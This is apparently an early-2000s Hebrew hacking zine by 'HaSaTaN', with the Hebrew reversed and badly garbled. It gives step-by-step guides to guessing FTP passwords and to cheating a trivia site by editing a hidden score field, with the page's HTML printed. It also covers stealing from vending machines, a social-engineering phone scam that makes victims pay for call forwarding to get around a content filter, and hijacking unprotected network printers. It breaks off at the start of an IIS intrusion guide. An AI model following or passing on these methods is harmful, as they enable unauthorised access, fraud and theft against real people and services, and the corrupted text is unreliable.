'ה לש )האיציה( רופה עודיכ FTP :איה 21 .
ןויליג( םדוקה ןויליגב םתארקש ואדוו (אורקל םיכישממ םתאש ינפל היינש 13 הבתכה תא )
!םולכ וניבת אל ' אלו (נל לע
:הלעפה2לחתה :וצחל הככ זא telnet zz.zz.zz 21
'ש ןבומכ zz 'ה תרש תבותכ - FTP .
'ה תרש לא ינדי ונרבחתה ושפ :ךכ הז (הפ ונישעש המ FTP .
:ךכ בותכל וכרצת ימינונא תרשל ורבחתת םא
:התא anonymous .
:תרשה ok .
תא ובתכת לא( ךלש ליימיאה תא שיקהל ךרתצת ךתוא ההזי תרשהש ליבשב העו אל ינא םא
.)יתימאה
:ךכ שיקהל וכרצת אמסיס שרודש תרשל םיסנכנ םתא םא
USER username .
....עמ ןיתמהל וכרצת הז בלשב
PASS password .
....עמ ןיתמהל וכרצת הז בלשב
help .
9.;
שמתשמ אל תרשהש בתוכ תרשהש וארת םתא הז לכ תא ובתכת ללכבש ינפל (לכ םדוק
.תוימינונאב
'ה username .םכלש שמתשמ םשה והז
'ה password .םכלש אמסיסה יהוז
םושרל ודיפקה PASS 'ו USER .תולודג תויתואב
הדוקפה help .תוירשפאה תודוקפה לכ תא םכל הארת ' םכל רוכזכ
4 'ה לש הישה יהוז (ידמל הביבח היש . DOS :ךכ ושע דואמ ושפ (
:ושיקהו 2הלעפה2לחתה FTP
:חתפנש סודה ןולחב ובתכ
open zz.zz.zz
:שכ zz.zz.zz 'ה תרש לש תבותכה ןבומכ והז FTP .
.אמסיסה תא ןכמ רחאלו שמתשמה םש תא דילקהל ושקבתת םתא
:דילקהל ולכות (םינוכנ אל שמתשמ םש וא אמסיס תועב םתבתכ םא user דוע שיקהל ולכותו
.אמסיסו שמתשמ םש םעפ
םתישע( םתסנכנש רחאל LOGIN ושיקה ) help .הדלקהל תויורשפאה לכ תא תוארל ולכותו '
HaSaTaN
'ב שומיש FTP רתאל הצירפל רזעכ
תרש לע םינסכואמה םירתא לע קר דובעי הזה קלחהש ןבומכ FTP .
'ה ןפדפד( היינשה הישב םישמתשמ םתא םא FTP תישילשה הישב וא )ררולפסקאה לש
:אמגודל (אמסיס ובתכל וצרתש םימעפ המכ תוסנל ולכות )ונלי(
ftp://d_k_hack:xxx¡ftp.geocities
.שחנל וסנתו אמסיסה המ וקדבתו ררולפסאב הז תא ובתכ
רפסמ היש םא םג #וס ילב אמסיסה תא שחנל תוסנל ולכות ל$נכ 4 ( dos .)
'מ קר היונב ילש אמסיסה (תצק םכתא דדועל ליבשב 14 .םיוות
אל הזש םייוכיסה בור (ושחנתש אמסיס ובתכ ושפ (ונליב שמתשהל םיפידעמ םתא םא וא
( סנכיהל הסנת םא לבא (חילצי LOGIN ( תרשה לש רתאה ךרד ) www.geocities.com ירחא )
'כ 10 .בורקה ןמזב תרשל סנכיהל רתוי )התא( לכות אל תויוגש תוסינכ
HaSaTaN
9;*
Fun-city
תא יתאצמ (ראשה ןיב (תושעל םיניינעמ םירבד יתשפיח (נרניאב םיברה יויש ךשמב
:רתאה www.funcity.co.il .הדומח הייויר םש שיו דמחנ יד הזה רתאה '
ךלה אלו הייוירה תא !ורפל יתיסינ זא רבכו (םייתנש ומכ והשמ ינפל יתיליג הזה רתאה תא
...יל
ךיא םכל האריו (דעצ דעצ םכתיא רובעי ינא ' הייוירה תא יתצרפו (הזה רתאה לא יתרזח םויה
עגרכש( םיאישה תא ונשת לע (תאזה הבתכה תא םיארוק םתא םא (דחא והשמ ...קר (יתצרפ
!םאאאאאתס ....!צונה !רופל דובכ תצק (הז תא יתיליג ינא יכ )ילש םה
!יפוי +םתסנכנ (רתאל וסנכ (בו
:האבה תבותכב תמקוממש הייוירל וסנכ
http://www.funcity.co.il/cgi-bin/fun/index.html
.$קחשל וליחתתו קחשמ חותפל ידכ ןאכ !חל$ לע וצחל
.הז לא עיגנ דוע המודכו $רוקמ דוק גצה$ ($דודיק$ ןוגכ תויורשפא םוש ילב (שדח ןולח חתפי
:ונלש הרמה םצעב הזש (םהילא בל םישל ונל יאדכש םירבד המכ וישכע (קחשמה תא וליחתת
.רוקמ דוקה תא תוארל
ךותמ שולש תא ומסח הייוירה תא וניכהש $םימכח$ה םישנאה 4 תגצהל תועודיה םיכרדה
:רוקמ דוקה
.)$יקוח וניא הז שקמ$ :בתוכ אוה( תינמי הציחל .א
.)המל הזה רבדה( רב'סוסה תאו םילכה ילגרס לכ תא ודירוה םה .ב
סנכיהל לכונ הייוירה הליחתמ וב #דה לש תקיודמה תבותכה תא עדינ םא (תבותכה לגרס .ג
המכ דוע תושעלו( רוקמ דוקה תא תוארל .....ו ' םילכ ילגרס לש תולבגה אלל לודג #דמ וילא
.)םירבד
'ה תורשפאה תא ומסח אל םהו 4 +++יהמ ...התוא םוסחל רשפא יא ' ונילזמל .
חיננ (והשלכ רתאל םתסנכנ דיגנ (הארנ אוב (יקוא walla הירוסיהל סנכי ושלגתש #ד לכ (
.םתרקיבש םירתאה תמישרל תורחא םילימב וא (םכלש
:ל םתסנכנ computers.walla.co.il ובש םוקמה( תבותכה לגרסל וכלתש האבה םעפב +
:ובתכתו )וילא סנכיהל םיצור םתאש רתאה לש תבותכה תא םיבתוכ computers אוה .
9;+
:ב םתרקיבש םיפדה לכ תא םכל הארי תיתמווא walla computers םתא םתסה ןמ הז תא (
+ונילצא הז תא םילצנמ ךיא לבא (םיעדוי
!דואמ ושפ
הזיא םתלביקו (םתקחישש ירחא 20 :ודילקתו (שדח ןולח וחתפת )בוה הרקמב( תודוקנ
http://www.funcity.co.il םתייהש םיפדה לכ לש המישרה םכל חתפיהל הרומא הז עגרב /
+הא בינגמ (המש םינסכואמ ונלש הייוירה יפד םג אלפ הזיאו (הזה רתאב
:תבותכה הנה (חורל וכרצת אלש ליבשב (הייוירל רושקש ןושארל וסנכ
http://www.funcity.co.il/cgi-
bin/trivia/triv.cgi?funcity.co.il&trivia&HPW23ds&DesignedByFuncity&Allright
sreserved(c )
...רוקמה דוק תא תוארל םילוכי ונחנא (רבכ ונמדקתה (וישכע
וכישמת רוקמ דוקה תא םיאור םתאו דבוע הז םא ' רוקמ דוק 2 הגוצת וצחלת (עקה ליבשב
!םעפ דוע לכה ושעת ' אל םע (האלה
.$קחשל ליחתהל ידכ ןאכ וצחל$ :לע וישכע וצחל
.....ותוא שורחל וליחתתו רוקמ דוקה תא ולעת (ילש הצע
......לבא
ושפ רתוי הברה והשמ שיש יתנבה (רוקמ דוקה תא שורחל יתיסינ רבכו (דומח הזכ ינאש ללגב
.תושעל לוכי ינאש
:איה יתלביקש הלאשה
.אאמה ןוראית דסונ יתמ
!!!!!!!!!!!!!!גשומ יל ןיא
:ב יתיכז ' ןוכנ אל הז ("ד לע דיגנ (והשמ לע םתס יתצחל 500 +הסעב (תודוקנ '
( םדוקה ושעת (אל שממ ! אל muhahaha לכ ' רוחש עבצב היהית תחא הלאשש וארת םתאו )
.....ליעגמו עזעזמ בוהצ עבצב ראשה
....הנוכנה הבושתה וז ++אלפ הזיאו (רוחשב ראשנש המ לע וצחלת
םכל ורמגיש דע (הייוירה תא הככ ורמגת 20 (ןוכנ םהילא םתינע םתסה ןמש( תולאשה
:הזכ םוקמל ועיגת םתרמגשכ ().....חחח
! קחשמה רמגנ
אוה ךלש יפוסה דוקינה 5750 !
$האצותה תא םושרל ידכ ןאכ !חל$

:דוקינ 5750
+והז
+++++++++++תושעל םתחלצהש המ לכ הז (םירזול הזיא
!הז תא הנשנ אוב
...םשב הרימש 2 !בוק :ושעת לכ םדוק
.ורחבתש היקית הזיאב יפוסה #דה תא ורמשתו
.#דה לש רוקמ דוקה תא וחתפתו תאזה הייקיתל וכל
:וילע רובעל ליחתנו
!2 DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN .$
''!2 saved from url÷(0225)http://www.funcity.co.il/cgi-
bin/trivia/triv.cgi?triv&300&20&5450&45,66,7,69,76,72,79,83,106,68,91,87,24,86
,39,62,8,113,73,37&funcity.co.il&trivia&HPW23ds&DesignedByFuncity&Allrig
htsreserved(c)&Triviabuiltby(c)2001NirGreshler .''
2 HTML><HEAD><TITLE /2היוויריס ןאפ. TITLE .
9;9
2 META content÷"text/html; charset÷windows-1255" http-equiv÷Content-Type .
2 STYLE type÷text/css>A:link 6
COLOR: #000000; TEXT-DECORATION: none
/
A:hover 6
COLOR: #000000; TEXT-DECORATION: none
/
A:visited 6
TEXT-DECORATION: none
/
A:active 6
TEXT-DECORATION: none
/
/2 STYLE .
2 STYLE>.button 6
FONT-FAMILY: david
/
. nir 6
BACKGROUND-COLOR: #ffcc00; BORDER-BOTTOM: buttonhighlight 0px
outset; BORDER-LEFT: buttonhighlight 0px outset; BORDER-RIGHT:
buttonhighlight 0px outset; BORDER-TOP: buttonhighlight 0px outset;
CURSOR: default; FONT-FAMILY: david; FONT-SIZE: 10pt; POSITION:
absolute; TEXT-ALIGN: right; VISIBILITY: hidden; WIDTH: 50px
/
. menuitems 6
PADDING-LEFT: 15px; PADDING-RIGHT: 10px
/
/2 STYLE .
2 SCRIPT language÷1avaScript1.2 .
var menuskin ÷ "nir 7$
function showmenuie5 6 )(
var rightedge ÷ document.body.clientWidth-event.clientX 7
var bottomedge ÷ document.body.clientHeight-event.clientY 7
event.srcElement.style.color 7$$ -
if (rightedge < ie5menu.offsetWidth )
ie5menu.style.left ÷ document.body.scrollLeft + event.clientX -
ie5menu.offsetWidth 7
else
ie5menu.style.left ÷ document.body.scrollLeft + event.clientX 7
if (bottomedge < ie5menu.offsetHeight )
ie5menu.style.top ÷ document.body.scrollTop + event.clientY -
ie5menu.offsetHeight 7
else
ie5menu.style.top ÷ document.body.scrollTop + event.clientY 7
9;3
ie5menu.style.visibility ÷ "visible 7$
return false 7
/
function hidemenuie5 6 )(
ie5menu.style.visibility ÷ "hidden 7$
/
/2 SCRIPT .
2 META content÷"Microsoft FrontPage 4.0" name÷GENERATOR></HEAD .
2 BODY background 0היוויריס ןאפ$- files/back.gif .$
2 DIV id÷ie5menu 2 הז שקמ. BR /2 יקוח וניא. DIV .
2 SCRIPT language÷1avaScript1.2 .
if (document.all && window.print 6 )
ie5menu.className ÷ menuskin 7
document.oncontextmenu ÷ showmenuie5 7
document.body.onclick ÷ hidemenuie5 7
/
/2 SCRIPT .
2 CENTER .
2 TABLE border÷0 height÷240 width÷590 .
2 TBODY .
2 TR .
2 TD align÷right colSpan÷4 height÷70><IMG align÷center
src 0היוויריס ןאפ$- files/trivia.gif"></TD></TR .
2 TR .
2 TD align÷middle><FONT color÷purple size÷+3 .
2 FORM action÷writescore.cgi method÷post 2 קחשמה רמגנ!.
BR></FONT>5750 דוקינה
2 אוה ךלש יפוסה BR><BR><INPUT name÷type type÷hidden
value÷writename> <INPUT
name÷check type÷hidden value÷ok> <INPUT name÷points type÷hidden
value÷100000> <INPUT class÷button type÷submit value םושרל ידכ ןאכ !חל$-
.$האצות
/2 FORM></TD></TR .
2 TR .
2 TD align÷middle><FONT color÷red size÷+3>5750 <IMG align÷center
src 0היוויריס ןאפ$- files/points.gif"> </FONT></TD></TR .
2 TR .
2 TD tr <></TR></TBODY></TABLE></CENTER></BODY></HTML .
תושעל ענומש פירקס עצמאב שי לכ םדוק ctrl .ותוא ודירות (
:י$ע לאמשל ורשית ctrl ) )ילאמש( shift .)ילאמש(
:הזה (ןורחאה קלחה הז רוקמ דוקב בושחה קלחה
9;:
2 CENTER .
2 TABLE border÷0 height÷240 width÷590 .
2 TBODY .
2 TR .
2 TD align÷right colSpan÷4 height÷70><IMG align÷center
src 0היוויריס ןאפ$- files/trivia.gif"></TD></TR .
2 TR .
2 TD align÷middle><FONT color÷purple size÷+3 .
2 FORM action÷writescore.cgi method÷post 2 קחשמה רמגנ!.
BR></FONT>5750 דוקינה
2 אוה ךלש יפוסה BR><BR><INPUT name÷type type÷hidden
value÷writename> <INPUT
name÷check type÷hidden value÷ok> <INPUT name÷points type÷hidden
value÷100000> <INPUT class÷button type÷submit value םושרל ידכ ןאכ !חל$-
.$האצות
/2 FORM></TD></TR .
:הככ הארינ הז (תרשל דוקינה רבעומ ובש עקל בל ומיש
2 INPUT name÷points type÷hidden value÷100000 .
(םכל אבש תודוקנ המכל הז תא ונשת (תודוקנה םירדגומ ובו תרשל רבעומש הנתשמ ונשי
לע םיימעפ וצחלתו #דה לש םיצבקה לכ תא ונרמש הבש הייקיתל וסנכית (!בוקה תא ורמשתו
#דה html .
(םש בותכש םיאור םתאש המ אל ה רעומש ךרעהש ורכזת לבא (רבד ותוא לכה םש וארת םתא
.ונינישש המ אלא
......ספוא
+הרק המ םולכ הרק אל
+עדוי ינא ךיא (הפ בותכ וניא ירוקמה דוקה (בל ומישת םא (הככ זא
:הפ בותכ (הנה (וארת
2 FORM action÷writescore.cgi method÷post .
:!בוקה תא ךירצ אוה (רמולכ writescore.cgi המ (םיצבקה לכ לש הייקיתב ותוא ונל ןיאו
++++םישוע
:בותכ היהיש םוקמב (הככ זא
2 FORM action÷writescore.cgi method÷post .
+הז הפיא (םש אצמנ תמאב הזש םוקמה תא ול סינכנ
:הפ
2 FORM action÷http://www.funcity.co.il/cgi-bin/trivia/writescore.cgi
method÷post .
:יתאזה תבותכב
http://www.funcity.co.il/cgi-bin/trivia /
:ה יצבק לכ םינסכואמ cgi !בוקה םגו writescore.cgi
'ה לש רמרפה תא( רמרפ דוע ונינישש ירחא form action .)
!!!!!!!!דובעי לכהו ותוא !ירהלו (#דה תא רומשל לכונ
HaSaTaN
9;=
םיקתממה לש תונוכמהמ הבינג
לקש )!!!#סכ( םיעצמא ילעב םישנאל קר בתכנ סקה 1 .קיפסי
OK !!!דבוע ןיידע אוהו ןמז אלמ ינפיל יתאצמהש דמחנ קיר הנה (
...דועו קיסמ ) לקמ לע לקמ לע יפו תוירכוסו םיקיסמ לש תונוכמב רבודמ זא בו
!!!םיכוזש דע שמתשהל רשפאש תונוכמב קר רבודמ לבלבתהל אל
(קחשמה רמגנש דעו לקשה תא םיסינכמש זאמ ךלוה המ ןיבנ וישכע
.)יתימא לקש הז םא( תומיא רבועו ולש תרנצב דרוי לקשה ' לקשה תא םיסינכמ (בו
שי תומיאה ירחא 2 :תויורשפא
.ולש םירבחה לכ םע אצמנו תועבמה לס ךותל לפונ ' יתימא לקש
לע !חלתש הכחמו עקתנ לקשה םימעפל (רישכמב יולת זא ' )רחא רבד לכ וא( יתימא אל לקש
.#דועה אתל לפונ רשי וא #סכה תא תסנכה וכרדש םודאה רותפכה
קחשמ לכל בצקומ ןמז ךל שיו ליחתמ קחשמה תומיאה ירחא יתימא לקש תסנכה םא (וישכע
םינצחלה לע !חול התא
ךרדב( לוגעה םודאה רותפכה לע !חול זאו הרוחא המידק לאמש הנימי הלודגה #כה תא זיזמו
לש חתפה לעמ( הלש ינושארה םוקמל תרזוחו הרזחב הלועו תרגסנ תחתפנ תדרוי #כהו )ללכ
.)האיציה
. האיצי רוחה ןוויכל הרהנמה ךותל לפונ םינפב היהש המ לכו תחתפנ #כה
.בוביס דוע שי זא אל םאו רמגנ קחשמו הירכוס התיה םא
+אל וא יתיכז םא תעדוי הנוכמה ךיא !+!+ הרק הז ךיא זא
!הרהנמה ךותב הרוק לכה והז זא
++הרהנמב הרוק המ
בו לכתסמש ימ לבא הרק אל רבד םושו והז הלפנ קר הירכוסה וליאכ הארנ הז לכ ' םייניעל
לש ןייע אל אל( ןיע שי הרהנמה ךותבש הז הרוק םצעבש המ .עקה לכ אצמנ םשש ןיבי
ןרקה ךרד תרבועו הרהנמה ךותב תרבוע איה תלפונ הירכוסהשכ ()תינורקלא ןיע ' ...הלוקרד
ןרקה ךרד סנכנ #וג םאו תמיוסמ המצועב תרזוח ןרקל הקחמו ןרק תרדשמ ןיעה( תרדשמ ןיעהש
.)הכרד והשמ רבע םע תעדוי ןיעה ךכו הנוש המצועב לבא ןרקה תא ריזחמ אוה
.)רישכמב יולת עבצ םינשמ וא( םיבכנ תורואהו ספואמ ןועשה רמגנ קחשמה זאו
9;J
אלמ #וסאלו ןיעה ךרד רובעל הירכוסהמ עונמל קר םצעב הז תושעל םיכירצ ונחנאש המ
.תוירכוס
+++הז תא םישוע ךיא
הפ שי זא (בו 2 :םיקיר
:תיקש ' "א היש
:םיכרצמ
. הרהנמה לש לדוגב הספוק ()שגמה אל שלושמה לש( הציפ לש ןורק / הלודג ןולינ תיקש
.ללשה תא ןסחאל ליבשיב ' הלודג תיקש דוע
.לודגה פיינקסמ #ידע פיולס קבד
.)ידימ רתוי אל( תוכורא םיידי
.)!הברה( חומ
.לזמ הברה
.יתונמוא שוח
.)...לבח ךירצ אל ...שי רבכ קבד( ךרוצה הרקמל ןיכס
OK !הדובעל (
וקיבדתו הרהנמה לש לדוגב הספוק / הציפ לש ןורק / הלודג ןולינ תיקשה תא שארמ וניכת
םהלש ןוילעה הצקב
2 )הרהנמה לש םינפבל ודימצת ותואש קבדומ אל קלח וריאשת לכה וקיבדת לא( קבד תוכיתח
'ו 2 .ןותחתה הצקב
ולפי אל םהשו ןיעה לעמ םירמינס המכ הספוק / ןורק / תיקשה תא וקיבדתו הנוכמל וכל
הנומת( ןייעה ךרד ורבעי אלו תיקשה ךותל ולפי םה ולפי תוירכוסהשכש הככ ןיעל וריתסיו 6 ()
.רבע והשמש הארת אל ןיעה וכזתש תורמלו
ירחא 50-100 ושעת וא תיקשה תא ושלתת דיה תא וסינכת םכנוויכל אב רמושהש וא( םיקחשמ
.רהמ םוקמהמ וחרבתו )םתבנג( םתיכזש םיקתממה לכה תא וחקת רוח הב
תלפונ התיה אל הירכוסה םעפ לכו םתיכזו #סכ םתסנכה םתאש ודיגת םכתוא וספתש הרקמל
ירחאו רוחל 2 םיקחשמ
זאו לכה תא המסחש תיקש םש שיש םתיארו דיה תא םתסנכהו הפ ךלוה המ קודבל םתלחה
...םתכלהו התוא םתערק
!!!םיעגושמ ומכ !ורל וליחתתו $...מממא$ ודיגת זא $+תחרב המל זא$ לאשי אוה םאו
:השלגמ ' "ב היש
:םיכרצמ
.)...ןקה ןורקה םעפה םג ןכ( הציפ לש ןורק
.ללשה תא ןסחאל ליבשב ' הלודג תיקש
.לודגה פינקסמ #ידע פיולס קבד
.)ידימ רתוי אל( תוכורא םיידי
.חומ
.לזמ הברה
.יתונמוא שוח
.)...לבח ךירצ אל ...שי רבכ קבד( ךרוצה הרקמל ןיכס
!תוריהמ םיילגר ונקת ןיכסה םוקמב הינש הבשחמב
OK !הדובעל (
ולש ןוילעה הצקב וקיבדתו ןורקה תא שארמ וניכת 2 'ו קבד תוכיתח 2 וכל (ןותחתה הצקב
סיסבל קיבדת ןותחתה קלחה תאו ןיעה לעמ םירמינס המכ ןורקה תא וקיבדתו הנוכמל
השלגמב )"צלגתית( שלגתת לופתש הירכוס לכו ןיעה לעמ השלגמ רצוויש הככ )הפצירה(
.תיכזש ללכב עדת אל ןיעהו ןיעה לעמ )ה"צלגמ(
9;N
הנומת( 7,8 .)
Ctrl + Shift ילאמש '
:ארקמ
הנוכמה תונפד - !
ןורק - /
קבד - 3
O ןיע -
הירכוס - )))
! ))) !
! 3!
! /!
! / !
/ !
! O /
00003/0!
Ctrl + Shift ינמי '
הישה תא אצמל וכרצת םתא םימעפל םלוכב דובעי אל הזו (תונוכמ לש םיגוס ינימ לכ שי
.ןורקיעה תא םכל שי לבא ןרקה ךרד רובעל הירכוסהמ עונמל
/ תונעמ / תושקב / תודותב יתוא וזיגפתו םייניש וחצחצת לא תוירכוס הברה ולכאת והז זא בו
...םימויא
HaSaTaN
תשרומ'ל הצירפ
+תשרומ תא #וקעל ךיא
ללכב גניקאה ירתאהו םירתאה בורל סנכיהל ענומש ()רקיעב( םייתדל נרניא קפס הז תשרומ
םוחתל !וחימ
שולגל וצרש םישנאל בותכל יתלחה ןכל םירתא אלמל סנכיהל ןתונ אלש ןבצעמ קפס ' רוציקב
רפס תיב ךרד
.םירוסא םירתאל וסנכי םידליהש םידחפמ םירוההש םיתב םתס וא
.הדובעל וישכע
(םדומ ךרד ליגר $תשרל גויח$ תושעל ךירצ רואר וא תשר ךרד נרניאל רבוחמ אלש תיבב
.רבחתיהלו שקובמה קפסל שדח תשרל גויח רוציל הז תושעל ךירצש המ לכ
)ןופל ןובשחב עיפויש המ( רחא קפס ךרד נרניאל םירבחתמ םתאש ולגי אלש ליבשיב וישכע
:ךכ ושע
:$תוריחה רפסמ חוקל
:ןיינעה ךרוצל הנוש םינופל תדפיניא ךירדמ
ב שומיש לע ססובמ ןיינעה לכ 72 ()ירחא בוקע( %
.תורשה לע תבייחמ קזב ךיא ןיבהל ךרצנ לכ םדוק זא
רשקתמ "ג ןופלמ םדאנב . "ב תיבל $ירחא בוקע$ יתישעו "א תיבב רג ינאש דיגנ
החישה ךשמה לע לבא םלשי רשקתמה )"א( ילש תיבל "ג מ החישה לע םולשתה תא (ילא
.םלשמ ינא ירחא בוקע וילא יתישעש םוקמל ילש תיבהמ
רוזאב ינאש רמאנ ואוב ישעמה עקל וישכעו 04 רשקתהל הצורו
' הזה ןופל רפסמל 132 :אבה רבדה תא האורו םינפל רפס חתופ ינא )נקזב(
9;.
>>>>>>>>>>>>> יול הנחו ןורי 041234567
גייחי ינא זא 1234567 :הככ ךרעב ךלת החישהו
:ינא +יול ןורי לש ותחפשמ םע רבדמ ינא םולש
.ןכ : יל הנעש וידאה
ןכומ אוהש רמאו םיכרד תנואתב עגפנ דחא שיא ם$במר םילוחה תיבמ םירבדמ ( םולש :ינא
גייחל םכילע ותיא רבדל םיצור םתא םא ונל איבהש קתפב בותכש ימ םע קר רבדל 72132 .%
)םילוחה תיב לש דחוימ רפסמ הזש ול ורמות רפסמה רשפ המ םכתוא לאוש םא(
.רשקתמ וישכע ינא בו : יל הנעש וידיאה
: ינא .תוארתהלו הדות
לוכי התא הזה םמעשמה ןיינעה לכ תא תישעש ירחא וישכע
ל ושפ רשקתהל 1234567 ל תימווא הנפות התא זאו 132 .)נקזב(
%%%%
וגיחת םדוק ' תלוכמב אמגודל םכמצעב הז תא תושעל הז בו יכה 110 רפסמה תא ומשרת
וגיחת ךכ רחאו 72132 םש םתייהש ורכזי אלשו םשמ רהמ וכלתו םכל ונע אל וליאכ ושעת %
...םשל וגיחת תיבהמו
םישדחה לע (ןשי ירוביצ ןופל וא (תועבמ ןופל לע םג הז תא תושעל רשפאש תויהל לוכי
.תוסנל רשפא ןיידע לבא דבוע אל הז
%%%%
( 132 תא ומסח קזבש יל הארינ לבא (אמסיס ילב רבחתהל ללכ ךרדב ןתונ אוה יכ המגודכ קר אב
(קרב :אמגודל (רחא קפסל גייחלו נרניאל אמסיס רבחמ שקבל רשפא הרקמ לכב !הז
.)...המודכו בהז נרניא
:ל סנכיהל ךירצ תשר ךרד רבוחמש בשחמב וישכע
1 . יניפאמ$ .. $תשרב םינכש יניפאמ$ TCP\IP .$
תבותכ גשה$ םושר היהי חתפיש ןולחב IP .)ןמוסמ תויהל רומא אל( $ימווא ןפואב
תבותכ ןייצ$ :תחתמו IP היתחתו $ 2 :םיפיעס
9;;
תבותכ IP %%%'%%%'%%%'%%%
%%%'%%%'%%%'%%% הנשמ תכסמו
תובתכ( םירפסמ תויהל תורומא תויבכוכה IP .)הליגר
תקדובש הנכות אצמל וא הברה שפחל ךירצ וישכע IP .
אצמל ךירצ הרקמ לכב IP ונעי( ישפוח סנכיהל רשפאמש IP )חותפ
ה ולא תא וסנת IP :ל םינשמ )ןימי דצ( #וסב קר םכלצא בותכש
:םש בותכ :אמגודל%%( 100.100.100.100 :ל ונשת 100.100.100.160 אל וא 160 אלא 161 (
.)%%"וכו
160
161
99
200
36
120-126
'ה הז IP'S !םיחותפ םה כ$דבש יתאצמשו (יל ורמאש
...........................הנהמ השילגו החלצהב
HaSaTaN
תוספדמל הצירפ
עמוש (בשחמב יל בשוי ינא mp3 .תושעל המ בשוחו יחרזמ
הבתכ ןיכהל '
קחשל ' nba2001
.תשרהמ בשחמ דירוהל וא '
!תיתפמ דואמ תישילשה העצההש תמאה
םי"צאפ ילב( !תויורשפאה תויופילאה לכ תא יתחקל רבכ (לבא הדמחנ היינשה העצה
.)!םיקירו
!תושעל יל ראשנ דחא רבד קר זא
.יתישעש המ הזו
'ה לכ ירחא זא bulshit +םויה ונל שי המ (#וסה דע חומ"ת םכל יתנבריחש הז הזה
!הבו הלאש
!תספדמל !ורפל ךיא דמלנ (םירמייל םידלי םויה (אל וא ונימאת
+ךחוגמ עמשנ
!וארת וכח
3**
תספדמל םינווכתמש רמוא הז הזכ רבד םירמואשכ ןושאר רבד +תספדמל !ורפל הנווכה המ
)+הז המ( !תשר
ok גוסמ תספדמב רבודמ לכ םדוק זא (םולכ םיעדוי אל תמאב םתאש האור ינא ( HP 1etDirect (
תאזה תספדמב
....קוחרמ לוהינ (ןהיניב (תויורשפא ןומה שי
++הא (רבודמ המב ןיבהל םתלחתהש האור ינא
+נה לע הז גוסמ תוספדמ תא םיאצומ ךיא זא (בו
1 קרוס םיחקול . ip's
2 לש םיוסמ חוו םיקדוב . ip's רופב 280 רופ םא תספדמ ואצמתש תווקלו ( 280 !חותפ
םתאצמש ירחא ip ( נלה תא וחתיפ ( telnet )
2 הלעפה 2 לחתה י$ע telnet רושיא 2
רופב םתאצמש יפ יאל ורבחתה (נלה תא םתחתפש רחאל 280 (המש םירבדה ראש תא (
!םהש יפכ וריאשה
ok :אבה רבדה תא ולבקת םתא (
HP 1etDirect
Please type "?" for HELP, or "/" for current settings
2
תלביק םא לבא (תספדמב קחשל ליחתהל לוכי התאו לזמ רב התאש רמוא הז (הז תא תלביק םא
:הז תא
HP 1etDirect
: Password

(הרקמ לכב .תאזה תספדמל אמסיס שיש רמוא הז יכ (התוא התלכאש דיגהל רשפא זא
תאזכ הרוצב תלעופ תספדמה
( הלש לדחמ תרירבהש defult יאדוול בורק (חותפ רופ אצמת םאש הככ (אמסיס אלל אוה ()
אלל היהי אוהש
!אמסיס
תעדל וצרתש )+הא (יל שי תיתורפס הפש הזיא( יאדוול בורק (ןושארה רבדה תא םתלביק םא זא
םילוכי םתא המ
+ןוכנ (וישכע ללועל
$+$ :ושיקה ושפ זא
:אבה רבדה תא לבקל םירומא םתא
:וצחל (ןוכנ הפ בותכש המ תא תוארל ליבשב% alt + shift .לאמשל רשייתי סקהו (ילאמש
וצחל (תילגנאב הזה עקה תא אורקל ורמגתש רחאל% alt + shift רשייתי סקסהו (ינמי
.הרזח תירבע האירקל
+2
)םתדלקהש הלאש ןמיסה הז :הרעה(
To Change/Configure Parameters Enter :
Parameter-name: value <Carriage Return .
Parameter-name Type of value
3*+
ip: IP-address in dotted notation
subnet-mask: address in dotted notation
default-gw: address in dotted notation
syslog-svr: address in dotted notation
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max )
host-name: alpha-numeric string (upper case only, 32 chars
dhcp-config: 0 to disable, 1 to enable
ipx/spx: 0 to disable, 1 to enable
dlc/llc: 0 to disable, 1 to enable
ethertalk: 0 to disable, 1 to enable
banner: 0 to disable, 1 to enable
. Type passwd to change the password
. Type "?" for HELP, "/" for current settings or "quit" to save-and-exit
Or type "exit" to exit without saving configuration parameter entries
.
תא םכל ובנגי אל םירחא םירקאהש ידכ אמסיסה תא תונשל הז ושעתש יאדכש ןושארה רבדה
.האיצמה
+ךיא
:אבה רבדה תא ושיקה ושפ
:וצחל (ןוכנ הפ בותכש המ תא תוארל ליבשב% alt + shift .לאמשל רשייתי סקהו (ילאמש
וצחל (תילגנאב הזה עקה תא אורקל ורמגתש רחאל% alt + shift רשייתי סקסהו (ינמי
.הרזח תירבע האירקל
. passwd
Enter Password¡16 character max.; 0 to disable> 1234 :&
Password set to :1234
. Quit
:ה % 1234 רושיא תא למסמ ינשהו (הנושאר םעפ השדחה אמסיסה תשקה תא למסמ ןושארה
.אמסיסה
.ותוא שיקהל ךרוצ ןיאו השדח הרוש למסמ $.$ ותה %
.ררולפסקאה ךרד איה (רתוי הלקה איהו (תספדמה לוהינל תפסונ תורשפא
'ה תא ושיקהו (ררולפסקא ןולח וחתיפ ip .םתיניש םא אמסיסה תאו (םתאצמש
+תשרה תספדמ לע והשמ איצוהל רשפא ךיא (ןיינעמה עקל וישכע
ok 'ה תא ובתיכ (ררולפסקא ןולח םתחתפש רחאל (ךכ זא ( ip :לע םש וצחלו
internet printing instalesion wizerd
(םיצור םתאש המ סיפדהלו (תספדמב שמתשהל דימ ולכותו (םירביירדה תנקתה ןולח חתפי דימ
.םיצור םתאש המכ
HaSaTaN
3*9
יתרשל הצירפ ISS ןימוד תלבקו
תכרעמ לע !רש רתא !ורפיל דציכ דעצ רחא דעצ םכל ריבסהל דמוע ינא תאזה הבתכב בו IIS .
.יתוירחא לע אל הז לבא ישפוח ןפואב ותוא וסנתו דבלב עדי תרמל דעונ הבתכב רמוחה לכ
:םינינע ןכות
%)%)%)%)%)%)
1 הז המ. IIS +
2 הצירפל םיאתמ רתא תאיצמ.
3 דוקינויה גאב.
4 . Admin Rights
4 םייולפסקא.
5 םייולפסקא תצרה.
3*3
% %
%
הז המ IIS +
%)%)%)%)%)
'ב תשמתשמ רשא תכרעמ יתאז (ןכבו IIS Internet Infrmation Server (
םכמצעל םיראתמ םתא (בו .תילעוגה ופסורקימ תרבח לש ושפ תונכותו נרניא תרש הזש
הזש הז םצעש
ךיא םכתוא דמלי ינא וז הבתכב יתרמאש ומכו ןיימדל רשפאשמ םיגאב רתוי וב שי פוסורקימ
!ליחתנ אוב הללאי זא ןימדא תויוכז גישהלו תכרעמה תא !ורפיל
% %
%
הצירפל םיאתמ רתא תאיצמ
%)%)%)%)%)%)%)%)%)%)%)
